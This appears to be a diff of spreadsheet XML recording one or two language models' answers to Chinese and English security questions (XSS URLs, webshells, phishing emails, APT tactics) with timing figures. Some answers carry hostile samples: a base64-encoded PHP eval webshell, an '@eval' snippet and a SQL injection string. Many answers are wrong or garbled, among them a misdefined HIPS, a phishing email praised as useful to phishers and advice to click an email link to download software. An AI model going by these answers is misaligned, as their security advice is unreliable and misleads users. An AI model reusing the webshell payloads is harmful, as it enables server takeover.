+          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_code_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id_zh&amp;quot;:&amp;quot;729736&amp;quot;}
+这个url中使用了javascript的encodeURIComponent()方法进行了编码，以便在url中包含特殊字符。
+判断这是否是一个网络攻击吗？
+based on the provided URL, it appears to be a legitimate URL for a web service that is using encoded special characters to pass parameters in the URL.
+There are several encoded special characters in the URL, including:
+* `%` (escaped as `%25`)
+* `;` (escaped as `%3B`)
+* `?` (escaped as `%3F`)
+* `amp;` (escaped as `%26`)
+* `&lt;/` (escaped as `%3C`)
+* `&gt;` (escaped as `%3E`)
+These encoded special characters are commonly used in URLs to allow for the inclusion of special characters in the URL without breaking the URL syntax.
+Based on the provided URL alone, it does not appear to be a network attack. However, it is important to note that the URL could potentially be used in a network attack if it is used in conjunction with other malicious data or if it is used to access a vulnerable web application.
+It is always a good practice to verify the authenticity of URLs and to use secure communication protocols (such as HTTPS) to protect against potential network attacks.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D61" t="n">
-        <v>5.581981897354126</v>
+        <v>19.8389093875885</v>
       </c>
     </row>
     <row r="62">
@@ -1782,19 +2121,16 @@
       </c>
       <c r="C62" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-Please help me to identify whether this is a network attack or not.
-The URL you provided is an example of a cross-site scripting (XSS) attack. This type of attack is a common web security vulnerability that allows an attacker to inject malicious scripts into a website, which can be executed by unsuspecting users.
-Here's how the attack works:
-1. The URL you provided contains a `script` tag that points to a malicious script located on the attacker's server.
-2. When a user visits the URL, the browser will execute the script, which will display an "alert" box with the message "xss".
-3. The attacker can use this type of attack to steal sensitive information, such as login credentials, or to take control of the user's session.
-To protect against XSS attacks, it's important to properly sanitize and encode user input, and to validate user input against a whitelist of allowed input types. Additionally, using a Content Security Policy (CSP) can help to restrict the types of scripts that can be executed on a website.
-In summary, the URL you provided is</t>
+          <t>This is a URL that contains a suspicious script tag. When the user clicks on the link and visits the website, the script tag will be executed, potentially leading to a cross-site scripting (XSS) attack.
+Here are some reasons why this URL is suspicious:
+1. Unknown domain: The URL is pointing to a domain that is not known or trusted. This increases the risk of an XSS attack.
+2. Script tag: The script tag is not encapsulated in a proper HTML comment, which can make it vulnerable to XSS attacks.
+3. Unknown parameter: The URL contains an unknown parameter (id=1), which can be used to inject malicious code.
+To protect yourself from XSS attacks, you should avoid clicking on suspicious links or visiting untrusted websites. If you are unsure about the legitimacy of a website, you can check its security certificate or contact the website's administrator to verify its authenticity.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D62" t="n">
-        <v>5.146857976913452</v>
+        <v>5.01775074005127</v>
       </c>
     </row>
     <row r="63">
@@ -1809,14 +2145,13 @@
       </c>
       <c r="C63" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-在这个 URL 中，我们可以看到一个 encode 函数，它接受一个 type 参数和一个 id 参数。我们可以通过 inspecting 这个 URL 来发现，type 参数的值为 3，而 id 参数的值为 1。
-但是，我们还可以发现一个 suspicious 的 script 元素，它包含一个 alert 函数，并且包含一个敏感信息 "xss"。这个 script 元素可能是一个 XSS 攻击，可以让攻击者在用户的浏览器中出现一个警示提示，并且可以让攻击者获得用户的 cookie 和其他敏感信息。
-因此，我们建议您在访问这个 URL 时多加保�</t>
+          <t>Please note that this is just an example and it is not real. Do not attempt to access the URL provided as it may be harmful.
+The URL you provided is an example of a cross-site scripting (XSS) attack. It is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which can be executed by the user's browser. In this case, the script "alert('xss')" is injected into the website, which will be executed when the user views the page. This can lead to unauthorized data theft, user profiling, and other malicious activities.
+It is important to protect against XSS attacks by validating user input, sanitizing data, and using Content Security Policy (CSP) to define which scripts are allowed to run on a website. Additionally, using a web application firewall (WAF) and keeping software up to date can also help prevent XSS attacks.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D63" t="n">
-        <v>5.151780366897583</v>
+        <v>4.861932277679443</v>
       </c>
     </row>
     <row r="64">
@@ -1830,15 +2165,22 @@
       </c>
       <c r="C64" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-XSS攻击是一种常见的攻击方式，它可以在用户输入的数据中插入恶意代码，从而让用户的系统执行恶意操作。XSS攻击有哪些特征？以下是一些常见的特征：
-1. 表单劫持：XSS攻击者可以在用户输入的表单中插入恶意代码，以便在用户提交表单时执行攻击。
-2.  redirects：XSS攻击者可以 redirects 用户到恶意网站，从而执行攻击。
-3.  DOM-based：XSS攻击者可以在用户的浏览器中插入恶意代码，以便在用户浏览网</t>
+          <t>XSS攻击可以有以下几个特征：
+1. 用户input：XSS攻击通常会使用用户输入，例如表单提交、URL参数、JavaScript脚本等。攻击者可以在用户输入中 inject 恶意代码，以便在用户上发送请求时执行这些代码。
+2. 不可靠的信任：XSS攻击可以利用不可靠的信任，例如不可靠的数据来源或不安全的 third-party 服务。攻击者可以利用这些不可靠的信任来在用户上执行攻击。
+3. 缓存攻击：XSS攻击可以利用缓存机制，例如缓存数据或缓存Cookies等。攻击者可以利用缓存机制来在用户上执行攻击。
+4. 跨域攻击：XSS攻击可以利用跨域请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
+5. 端到端攻击：XSS攻击可以利用端到端通信来执行攻击。例如，攻击者可以通过端到端通信来在用户端上执行攻击。
+6. 非授权访问：XSS攻击可以利用非授权访问来执行攻击。例如，攻击者可以通过非授权访问来访问用户数据或系统。
+7. 数据劫持：XSS攻击可以利用数据劫持来执行攻击。例如，攻击者可以通过数据劫持来获取用户数据或系统数据。
+8. 系统滥用：XSS攻击可以利用系统滥用来执行攻击。例如，攻击者可以通过系统滥用来获取系统权限或执行恶意操作。
+9. 缓存破坏：XSS攻击可以利用缓存破坏来执行攻击。例如，攻击者可以通过缓存破坏来破坏用户缓存或系统缓存。
+10. 跨站攻击：XSS攻击可以利用跨站请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
+总之，XSS攻击可以通过多种方式来执行攻击，因此需要严格验证用户输入和数据来防止攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D64" t="n">
-        <v>5.144295692443848</v>
+        <v>21.04108595848083</v>
       </c>
     </row>
     <row r="65">
@@ -1852,16 +2194,20 @@
       </c>
       <c r="C65" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-如何判断主机是否被入侵？
-首先，你需要了解主机的通信协议和通信路径，包括它与其他主机之间的通信。通信协议可能是TCP、UDP或ICMP，而通信路径可能是IPv4或IPv6。
-以下是一些常见的入侵检测方法：
-1. 监控交互：你可以监控主机之间的交互，包括包量、响应时间和错误率。如果你发现主机之间的交互模式不寻常，那么可能是入侵。
-2. 监控网络流量：你可以监控主机之间的网络流量，包括包数量、传输速��</t>
+          <t>判断主机是否被入侵是一个非常重要的任务，以下是一些常用的方法：
+1. 监控主机的网络 траffics：使用网络监控工具，可以监控主机的网络 траffics，检查是否有不同于常规的网络活动，例如：检查网络流量的大小、包数量和类型，以及检查网络连接的数量和质量。
+2. 监控主机的系统级别：使用系统监控工具，可以监控主机的系统级别，检查是否有新的程序或服务被添加，或者是否有内存或处理器的占用率增加。
+3. 检查主机的系统 logs：检查主机的系统 logs，以查看是否有任何不当操作或错误操作。
+4. 使用安全软件：使用安全软件，例如安全防范软件、杀毒软件，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
+5. 使用网络检测软件：使用网络检测软件，例如网络检测软件，检查主机的网络连接和安全状态。
+6. 使用安全核心：使用安全核心，例如安全核心，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
+7. 使用域名服务器：使用域名服务器，例如域名服务器，检查主机的域名和 DNS 记录，以查看是否有任何不当操作或错误操作。
+8. 使用邮件服务器：使用邮件服务器，例如邮件服务器，检查主机的邮件服务器和邮件监控器，以查看是否有任何不当操作或错误操作。
+需要注意的是，这些方法不是一定可靠的，因为入侵者可能会隐藏他们的操作，或者使用恶意软件或恶意程序来隐藏他们的操作。因此，应该通过多种方法来监控和判断主机是否被入侵，以确保主机的安全。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D65" t="n">
-        <v>5.194963455200195</v>
+        <v>18.33541393280029</v>
       </c>
     </row>
     <row r="66">
@@ -1875,15 +2221,21 @@
       </c>
       <c r="C66" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-数据泄露可能会导致多种不良影响，包括：
-1. 个人隐私泄露：泄露个人数据可能导致 identifier 泄露，包括姓名、地址、电话号码等。这些信息可以被用于诈骗、追杀、威胁等目的。
-2. 财务泄露：泄露财务信息，如银行卡资料、贷款账户等，可能导致银行账户被滥用、贷款账户被滥借等问题。
-3. 经济泄露：泄露经济信息，如企业��</t>
+          <t>数据泄露可能会导致的各种风险包括：
+1. 个人隐私泄露：数据泄露可能会导致个人的个人资料、姓名、地址、电话号码等隐私泄露，导致人们面临identity theft、诈骗、敏感資訊泄露等威胁。
+2. 经济损失：数据泄露可能会导致经济损失，包括客户信任损失、财富损失、误投资等。
+3. 重大灾难：数据泄露可能会导致重大灾难，例如：恶意破坏、恶意识识、恶意攻击等。
+4. 法律和行政问题：数据泄露可能会导致法律和行政问题，包括违反私隐保护法、违反数据保护法等。
+5. 社会影响：数据泄露可能会导致社会影响，包括社会信任危机、社会不稳定、社会不公正等。
+6. 媒体报导：数据泄露可能会导致媒体报导，包括社会名人泄露、著作权侵犯等。
+7. 客户敏感資訊泄露：数据泄露可能会导致客户敏感資訊泄露，包括财政資訊、个人資訊、醫療資訊等。
+8. 误投资：数据泄露可能会导致误投资，包括投资欺诈、投资损失等。
+9. 财务泄露：数据泄露可能会导致财务泄露，包括财务数据泄露、财务误投资等。
+10. 技术问题：数据泄露可能会导致技术问题，包括系统崩溃、数据损失、技术支持问题等。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D66" t="n">
-        <v>5.274636745452881</v>
+        <v>18.89712333679199</v>
       </c>
     </row>
     <row r="67">
@@ -1897,14 +2249,20 @@
       </c>
       <c r="C67" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-HIPS（Hybrid Information Protection Scheme）是一种用于保护敏感数据的安全框架，它将数据分为多个层，并在每个层上实现安全控制，从而保护数据的完整性、完整性、可用性和安全性。下面是一些常见的HIPS产品：
-1.  McAfee HIPS：McAfee 是一个著名的安全软件公司，其HIPS产品可以在Windows、Linux和Mac 等操作系统上采用。它可以检测和防止敏感数据的泄露、篡改和非法访问。
-2.  Symantec HIPS：Symantec 是一个领先的安全软件公司，</t>
+          <t>HIPS（Heterogeneous Integration Platform Services）是IBM的一个集成平台，用于快速整合多个技术领域的芯片设计。以下是一些HIPS产品的列表：
+1. HIPS Flow: 用于简化和快速整合芯片设计的Flow工具，包括HDL模型化、硬件拟合、验证和缓存分析等功能。
+2. HIPS Liberator: 用于快速整合芯片设计，包括RF、CMOS、BiCMOS和 Photonic 等多种技术领域的芯片设计。
+3. HIPS Explorer: 用于探索和分析芯片设计，包括芯片结构、硬件拟合、验证和缓存分析等功能。
+4. HIPS Modeler: 用于模拟和分析芯片设计，包括HDL模型化、硬件拟合和验证等功能。
+5. HIPS Emulator: 用于模拟和验证芯片设计，包括芯片模拟、验证和缓存分析等功能。
+6. HIPS Optimizer: 用于优化芯片设计，包括硬件拟合、验证和缓存分析等功能。
+7. HIPS Analyzer: 用于分析芯片设计，包括硬件拟合、验证和缓存分析等功能。
+8. HIPS Debugger: 用于调试芯片设计，包括硬件拟合、验证和缓存分析等功能。
+这些产品可以帮助开发者快速整合多个技术领域的芯片设计，提高设计效率和质量。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D67" t="n">
-        <v>5.256976127624512</v>
+        <v>14.71840834617615</v>
       </c>
     </row>
     <row r="68">
@@ -1918,15 +2276,23 @@
       </c>
       <c r="C68" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-如何划分网络区域才能更安全？
-网络区域分划是指将网络分成不同的区域，以便更好地控制访问和管理网络资源。对于大型网络拥有者，划分网络区域可以帮助提高网络安全性和可用性。以下是划分网络区域的一些方法：
-1. 根据用户分类：将网络用户分为不同的分类，例如管理员、普通用户、外部用户等，并对每个分类进行不同的访问控制。
-2. 根据安全性分类：将网络区域分为不同的安全性分类，例如内部网络、中间网络</t>
+          <t>如何划分网络区域才能更安全？
+划分网络区域是指将网络分成不同的区域，以便对每个区域进行更加精细的安全控制。这种方法可以帮助网络管理者更好地防范攻击和维护网络的安全。
+以下是一些可能有用的划分网络区域的方法：
+1. 根据网络资源的分类：将网络分成不同的资源类别，例如客户端、服务器、数据库和网络设备等。对每个资源类别进行安全检查和策略定制。
+2. 根据网络服务的分类：将网络分成不同的服务类别，例如web服务、电子邮件服务、协议服务等。对每个服务类别进行安全检查和策略定制。
+3. 根据网络用途的分类：将网络分成不同的用途类别，例如企业网络、学习网络、个人网络等。对每个用途类别进行安全检查和策略定制。
+4. 根据网络连接的分类：将网络分成不同的连接类别，例如内网连接、外网连接、虚拟专用网络等。对每个连接类别进行安全检查和策略定制。
+5. 根据网络设备的分类：将网络设备分成不同的类别，例如路由器、交换机、firewall等。对每个设备类别进行安全检查和策略定制。
+6. 根据网络流量的分类：将网络流量分成不同的类别，例如网络应用流量、数据流量、VOIP流量等。对每个流量类别进行安全检查和策略定制。
+7. 根据网络攻击的分类：将网络攻击分成不同的类别，例如黑客攻击、恶意软件攻击、网络泄露等。对每个攻击类别进行安全检查和策略定制。
+8. 根据网络资源的易访问程度的分类：将网络资源分成不同的易访问程度类别，例如内部资源、外部资源、公共资源等。对每个资源类别进行安全检查和策略定制。
+9. 根据网络资源的敏感程度的分类：将网络资源分成不同的敏感程度类别，例如高敏感资源、中敏感资源、低敏感资源等。对每个资源类别进行安全检查和策略定制。
+10. 根据网络资源的</t>
         </is>
       </c>
       <c r="D68" t="n">
-        <v>5.266788244247437</v>
+        <v>24.38762617111206</v>
       </c>
     </row>
     <row r="69">
@@ -1940,15 +2306,23 @@
       </c>
       <c r="C69" t="inlineStr">
         <is>
-          <t xml:space="preserve"> APT attacks typically involve a combination of the following techniques:
-1. Reconnaissance: APT actors conduct surveillance on their target to gather information about their network architecture, security measures, and potential vulnerabilities. This can involve gathering information from public sources, social engineering, or using exploit tools to gather information from inside the network.
-2. Command and control (C2): APT actors establish a command and control infrastructure to communicate with their malware and exfiltrate data. This can involve setting up a network of command servers, using encryption to protect communication, and using techniques such as domain name system (DNS) tunneling or exploiting vulnerabilities in network protocols to establish a hidden communication channel.
-3. Malware deployment: APT actors deploy customized malware that is designed to evade detection by security systems. This can involve using techniques such as code obfuscation, anti-virus (AV) evasion, and exploiting vulnerabilities in software or firmware to gain a foothold in the target's system.
-4. Lateral movement: Once a system has been compromised, APT actors work to establish persistence and move laterally within</t>
+          <t>Apt是一个指代高级恶意软件（Advanced Persistent Threat）的术语，apt组织通常会采用哪些攻击手段？
+Apt组织通常采用以下攻击手段：
+1.  socially engineered phishing attacks：钓鱼式攻击，通过电子邮件、 instant messaging 或社交媒体等渠道诱惑用户提供敏感信息，例如帐户名称和密码。
+2.  Malware infection：恶意软件感染，通过攻击者在用户计算机上传输的恶意软件，攻击者可以通过访问计算机和网络进行快速扩展和扩张。
+3.  Lateral movement：side-channel attacks，通过访问与攻击者关联的计算机或网络，以实现快速扩展和扩张。
+4.  Privilege escalation：升级权限，通过利用漏洞或恶意软件来升级用户帐户的权限，以实现访问控制和数据泄露。
+5.  Data exfiltration：数据泄露，通过将敏感数据从攻击者的计算机或网络 transferred to a remote location，以实现数据泄露。
+6.  Command and control：指令和控制，通过将攻击者的计算机或网络与攻击目标的计算机或网络相连，以实现控制和监控。
+7.  Denial of Service：屏蔽服务，通过屏蔽或攻击攻击目标的网络或服务，以阻断或减轻攻击目标的访问和服务。
+8.  Web application attacks：攻击Web应用程序，通过攻击Web应用程序的漏洞或欺购Web应用程序的权限，以实现攻击目标。
+9.  Cloud attacks：攻击云计算环境，通过利用云计算环境中的漏洞或欺购云计算环境的权限，以实现攻击目标。
+10.  Mobile device attacks：攻击移动设备，通过利用移动设备的漏洞或欺购移动设备的权限，以实现攻击目标。
+这些攻击手段可能会变化或受到更新，因此需要定期审查和缓存最新的攻击手段。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D69" t="n">
-        <v>5.271239757537842</v>
+        <v>19.66598010063171</v>
       </c>
     </row>
     <row r="70">
@@ -1963,17 +2337,14 @@
       </c>
       <c r="C70" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-This code is dangerous and should not be executed. It is vulnerable to SQL injection attacks and can lead to unauthorized access to your database.
-Here's why:
-1. Unvalidated user input: The code accepts input from the user without proper validation. This means that an attacker can enter malicious SQL code, which will be executed by the `@eval` statement.
-2. Lack of input sanitization: The code does not sanitize the input properly, which can lead to SQL injection attacks. An attacker can enter malicious input, such as `'; DROP TABLE Users; --`, which will be executed by the `@eval` statement.
-3. Execution of arbitrary code: The `@eval` statement can execute arbitrary code, which can lead to unauthorized access to your database. An attacker can enter malicious code, such as `echo 'root';`, which will be executed by the `@eval` statement.
-To avoid these vulnerabilities, you should always validate and sanitize user input, and never execute arbitrary code. Use prepared statements and parameterized queries to prevent SQL injection attacks, and use secure coding practices to avoid vulnerabilities.&lt;/s&gt;</t>
+          <t>This code is dangerous because it allows an attacker to execute any PHP code by sending a specially crafted request to the server. The `@` symbol in the `eval()` function is used to suppress errors, which means that any errors that occur during the evaluation of the code will be silently ignored. This can lead to unexpected behavior, including the execution of malicious code.
+In this example, the code `&lt;?php @eval('caidao');?&gt;` is executed without any checks or validation, which means that an attacker could potentially send a request that evaluates to any PHP code, including malicious code. This could allow the attacker to gain control of the server, steal sensitive information, or carry out other malicious actions.
+To avoid this type of attack, it is important to properly validate and sanitize any user input before executing it as PHP code. This can be done using a variety of techniques, including input validation, output encoding, and using safe modes.
+In general, it is never a good idea to use `eval()` functions in a production environment, as they can introduce significant security risks. If you need to execute dynamic code, there are safer alternatives available, such as using a PHP interpreter or a web application firewall.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D70" t="n">
-        <v>5.252220153808594</v>
+        <v>6.293869495391846</v>
       </c>
     </row>
     <row r="71">
@@ -1988,16 +2359,17 @@
       </c>
       <c r="C71" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-这是一个base64编码的内容，但它看上去很危险。你可能会问，为什么它看上去危险呢？因为它包含了一些可能会被恶意攻击者利用的特殊字符。
-在这个例子中，我们使用了一个base64编码的内容，但它包含了一些特殊字符，例如：
-* `:` 这是一个危险的字符，可能会被恶意攻击者利用来执行XSS攻击。
-* `W` 这是一个特殊字符，可能会被恶意攻击者利用来执行SQL注入攻击。
-* `n` 这是一个特殊字符，可能</t>
+          <t>comment:
+这段base64编码的内容看上去危险吗？
+PD9waHAgQGV2YWwoJF9QT1NUWydjYWlkYW8nXSk7Pz4=
+ 它可能是一个恶意的 base64 编码的内容，但是我们无法确定它的具体含义或是否有危险。
+base64 编码是一种将 binary 数据转换为字符串的方式，它可以将数据编码为字符串，以便在不同的平台上进行交互。但是，如果你接受了一个不知道的 base64 编码的内容，那么它可能会承担一些风险。
+为了防止风险，建议你从可靠的来源接受 base64 编码的内容，并且确保你的系统和软件有正确的安全措施。如果你不知道这段 base64 编码的内容的来源，那么可能最好是不要接受它。
+总之，如果你不知道这段 base64 编码的内容的来源，那么它可能是一个危险的内容，建议你避免接受它。如果你知道的话，那么可以尝试解决它。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D71" t="n">
-        <v>5.284606218338013</v>
+        <v>10.33848667144775</v>
       </c>
     </row>
     <row r="72">
@@ -2060,12 +2432,17 @@
       </c>
       <c r="C72" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-这是一个钓鱼邮件，内容包括一个假日安排信息，其中包括假日开始和结束时间，以及一些附加信息。这个邮件的主要目的是通知收件人有关假日安排的信息。&lt;/s&gt;</t>
+          <t>这是一个钓鱼邮件，它包含一些很有趣的文本和HTML元素，可以用于吸引钓鱼者。这里有一些特点值注意：
+1. 邮件标题：这个邮件标题非常简洁，但它的语言非常友好，可以吸引钓鱼者关注。
+2. 团队成员：这个邮件包含一些团队成员的信息，可以帮助钓鱼者了解这个团队的背景和人才底resh。
+3. 链接：这个邮件包含一个链接，可以帮助钓鱼者了解更多信息。
+4. 异常的HTML元素：这个邮件中的HTML元素非常具有创意，包括文本、表格、图片和链接。
+5. 邮件结束：这个邮件结束了与钓鱼者的进程，并提供了一些链接，可以帮助钓鱼者了解更多信息。
+总的来说，这个钓鱼邮件非常有趣，可以帮助钓鱼者了解更多关于这个团队的信息，并且可以吸引钓鱼者的注意力。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D72" t="n">
-        <v>2.324414968490601</v>
+        <v>11.01055335998535</v>
       </c>
     </row>
     <row r="73">
@@ -2088,14 +2465,14 @@
       </c>
       <c r="C73" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-钓鱼邮件是一种用于欺诈和攻击的电子邮件，通常会在邮件主题或邮件正文中包含一个欺诈链接，或者包含一个诈骗的内容。
-这封邮件中的链接为 &lt;https://www.baidu.com/&gt;，这是一个合法的网站，但是在这种情况下，它可能会被用来攻击或欺诈用户。
-因此，我们建议大家尽快地点击链接来下载钓鱼防护软件，以确保自己的邮箱和计算机安全。&lt;/s&gt;</t>
+          <t>这是一个钓鱼邮件，由于邮件中提到了钓鱼防护软件，因此被分类为钓鱼邮件。
+钓鱼邮件通常包含一些特定的字符串或链接，以便在用户点击链接时诱惑他们提供钓鱼软件。这些链接可能会被植入了钓鱼软件，以便在用户点击后下载和安装软件。
+这个邮件中提到的链接为“&lt;a href="https://www.baidu.com/"&gt;192.168.100.100/edr.zip&lt;/a&gt;”，这可能是一个域名或IP地址，但它并不是一个有效的链接。这种域名或IP地址可能是一个恶意的链接，可能会攻击用户的计算机或骗取他们提供钓鱼软件。
+因此，当接收到类似的钓鱼邮件时，建议不要点击任何链接，而是直接忽略或 Delete 这个邮件。如果您需要下载钓鱼防护软件，可以寻找来自可靠源的软件，例如来自官方的安全软件网站或来自知名的安全软件公司。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D73" t="n">
-        <v>4.768253087997437</v>
+        <v>11.64256477355957</v>
       </c>
     </row>
     <row r="74">
@@ -2118,15 +2495,18 @@
       </c>
       <c r="C74" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-Please note that the above code is a webshell and it is not safe to execute it. It is a malicious code that can be used to gain unauthorized access to a web server or any other system.
-The code is using a technique called "code injection" to inject malicious code into a web page. The code is using the `&lt;%-- comments --%&gt;` syntax to embed the malicious code into the web page. When the web page is loaded, the code will be executed by the browser, allowing the attacker to gain control of the system.
-The code is also using the `Split` function to split the input string into an array, and then using a `For` loop to iterate over the array and inject the malicious code. The `Chr` function is used to convert the ASCII code of each character in the array to a hexadecimal value, which is then used to inject the malicious code into the web page.
-It is important to note that this is just one example of how a webshell can be constructed, and there are many other techniques that can be used to build a webshell. It is also important to be aware of the potential security risks associated with</t>
+          <t>This is a web shell, written in JavaScript, which can be embedded in a website to gain unauthorized access to a target system. The script is designed to decode and execute shellcode, which is a piece of machine code that can be used to execute arbitrary system commands.
+Here's how the script works:
+1. The script begins by declaring a function named `fun` that takes a string argument `Str`.
+2. The function decodes the string `Str` using the `Split` function, which splits the string into an array of substrings separated by the delimiter `%`.
+3. The function then loops through each substring in the array using a `For` loop, and for each substring, it appends the ASCII code of the character at that position in the substring to the `fun` variable using the `Chr` function.
+4. The function then ends with the `End Function` statement.
+The reason this script is considered a web shell is that it can be embedded in a website and executed by a visitor's browser, without their knowledge or consent. The script can then use the visitor's machine to gain unauthorized access to a target system, potentially leading to a security breach.
+It's important to note that this script is just an example, and it's not intended to be used in any malicious or illegal activity. However, it does demonstrate how a simple web page can be used to gain unauthorized access to a target system, and why web security is so important.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D74" t="n">
-        <v>5.302055597305298</v>
+        <v>8.160077571868896</v>
       </c>
     </row>
     <row r="75">
@@ -2178,15 +2558,16 @@
       </c>
       <c r="C75" t="inlineStr">
         <is>
-          <t xml:space="preserve">
+          <t>&lt;/%&gt;
 ```
-这是一个简单的Web shell，它使用了`ProcessBuilder`创建了一个新的进程，并通过读取输入流来读取该进程的输出。
-在上面的代码中，我们首先检查了扫描到的参数是否为空，如果为空，直接返回"Got Nothing"。接着，我们根据系统的文件分隔符（Windows系统使用"\\"，其他系统使用"/")来决定是否在Windows系统上执行命令。
-最后，我们使用`ProcessBuilder`创建了一个新的进程，并使用`Process#getInputStream()`获取到该进程的输入流。使用`Scanner`对象来读取输入流中的内容，并将其保存在`op`变量中。最后，我们使用`%&gt;`将`op`变量的</t>
+这是一个简单的WebShell，它使用了`ProcessBuilder`类创建一个进程，并通过读取进程输入流来获取用户输入。在这个例子中，用户可以输入一个命令，并在响应中看到命令执行结果。
+在这个例子中，我们使用了一个`ProcessBuilder`对象来创建一个进程，并将用户输入作为命令传递给它。然后，我们使用了一个`Scanner`对象来读取进程输入流，并将结果显示在屏幕上。
+这个WebShell可以用于执行一些简单的命令，但它并不安全。在实际使用中，您应该使用更加安全的方式来处理用户输入，例如使用`HttpServletRequest`和`HttpServletResponse`对象来处理Form表单提交，并使用安全的方式来防止XSS攻击。
+在大多数情况下，您不应该使用WebShell来执行命令，因为它可能会对您的网站造成安全风险。如果您需要实现一个简单的命令行Shell，可以考虑使用一个简单的Java服务，例如`java.lang.ProcessBuilder`或`org.jline.terminal.Terminal`。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D75" t="n">
-        <v>5.540139198303223</v>
+        <v>9.891859769821167</v>
       </c>
     </row>
     <row r="76">
@@ -2204,18 +2585,16 @@
       </c>
       <c r="C76" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-I think this is a webshell, but I'm not sure. It's definitely not a legitimate PHP script, as it contains a syntax error and an undefined function.
-The script appears to be trying to extract the value of a variable named `$password` from the URL, and then use it to perform an `array_udiff_assoc` operation on an array. However, the script is missing a closing `?&gt;` and doesn't contain any valid PHP code.
-If you're seeing this script on a website, it's possible that it's part of a webshell attack. Webshells are malicious scripts that can be used to gain unauthorized access to a website or server, and they often contain hidden functionality that can be used to perform malicious actions.
-If you're concerned about the security of your website or server, I recommend taking the following steps:
-1. Check your website's logs for any suspicious activity, such as unusual login attempts or file access.
-2. Review your website's security settings and make sure that all plugins and themes are up to date.
-3. Consider using a web application firewall (WAF)</t>
+          <t>这是一个简单的Web Shell，它可以在浏览器中打开。如果您是一个恶意个人，您可以使用这个Web Shell来执行任何操作在您的服务器上。
+我们可以通过分析代码来发现它可以perform以下操作：
+1. 获取 $_REQUEST 参数：这是一个可读取的$_REQUEST 参数，包含了用户输入的值。
+2. 使用 array_udiff_assoc() 函数：这个函数用于比较一个数组和另一个数组，并返回差异。在这个例子中，它用于比较 $_REQUEST 参数和一个固定的数组。
+3. 使用 assert() 函数：这个函数用于检查一个值是否等于另一个值。如果您在URL中输入了一个不符合预期的值，这个函数就会执行一个异常处理程序。
+总之，这个Web Shell可以用于执行任何操作在服务器上，只要您输入了一个合法的URL。如果您不想让您的服务器遭受攻击，请勿使用这个Web Shell。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D76" t="n">
-        <v>5.331138134002686</v>
+        <v>9.789537668228149</v>
       </c>
     </row>
     <row r="77">
@@ -2239,15 +2618,20 @@
       </c>
       <c r="C77" t="inlineStr">
         <is>
-          <t xml:space="preserve">
-这是一个通信维护攻击，其中使用了 SubString 函数来查找用户名，并通过执行power函数来执行 arbitrary 操作。
-通信维护攻击是指在用户名中包含特定字符串时执行某个操作。在这个例子中，攻击者使用 substr 函数来查找用户名的第一个字符，并将其 compare 到 'r'。如果用户名的第一个字符是 'r'，则执行 power 函数，并将其传递给攻击者。
-以下是一些防范策略，可以帮助防止类似攻击：
-1. 对用户名进行正规化处理：可以对用户名进行正规化处理</t>
